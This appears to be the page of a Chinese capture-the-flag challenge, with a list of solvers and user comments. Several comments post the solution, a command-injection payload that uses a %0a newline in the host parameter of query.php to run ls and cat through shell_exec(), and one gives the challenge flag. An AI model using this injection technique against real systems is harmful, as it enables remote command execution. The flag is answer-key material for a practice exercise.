评分(1)
解题动态

wakelzf 攻破了该题 2小时前

15629299376 攻破了该题 4小时前

HF101010 攻破了该题 17小时前

oung. 攻破了该题 17小时前

Miss23 攻破了该题 2天前

超级小白2025 攻破了该题 2天前

DoubleUUU 攻破了该题 2天前

青菜白玉汤 攻破了该题 2天前

odup 攻破了该题 3天前

Renown 攻破了该题 4天前

kaiyafanfan123 攻破了该题 7天前

18897888104 攻破了该题 8天前

Bolzman 攻破了该题 9天前

xiaoyaofawaimg 攻破了该题 10天前

slience 攻破了该题 10天前

kfdwty 攻破了该题 11天前

liuguowang75 攻破了该题 12天前

zzcy 攻破了该题 16天前

leonleonleon 攻破了该题 19天前

评论
MoCaser 1月前
举报
不懂的建议花金币看看wp
000ooo 4月前
举报
①/query.php?host=whois.verisign-grs.com%0a&query=ls ②/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
zzz666 2月前
举报
@cyffk 空格和换行会被url编码
cyffk 4月前
举报
为什么%不会被过滤?
Zhumeng 4月前
举报
查看query源代码发现有个shell_exec()可以rce 通过%0a去截断第一个参数,然后在第二个参数里面输入ls可以查看当前目录文件 然后cat命令读取文件 空格需要url编码
admin9101 6月前
举报
http://82.157.146.43:16777/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
MOCHAOLIN 7月前
举报
(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf
wj834722134 8月前
举报
host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内
xwWx 2月前
举报
@TOMCAT336699 x0a 是换行的话大概是 正则表达式只匹配换行之前的字符串
TOMCAT336699 3月前
举报
您弄明白了没有,你这个问题,我没找出答案来,谢谢
Tao23 10月前
举报
query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
to5ny 11月前
举报
/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
xzs297995 1年前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
xiaoxiao972521 1年前
举报
/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME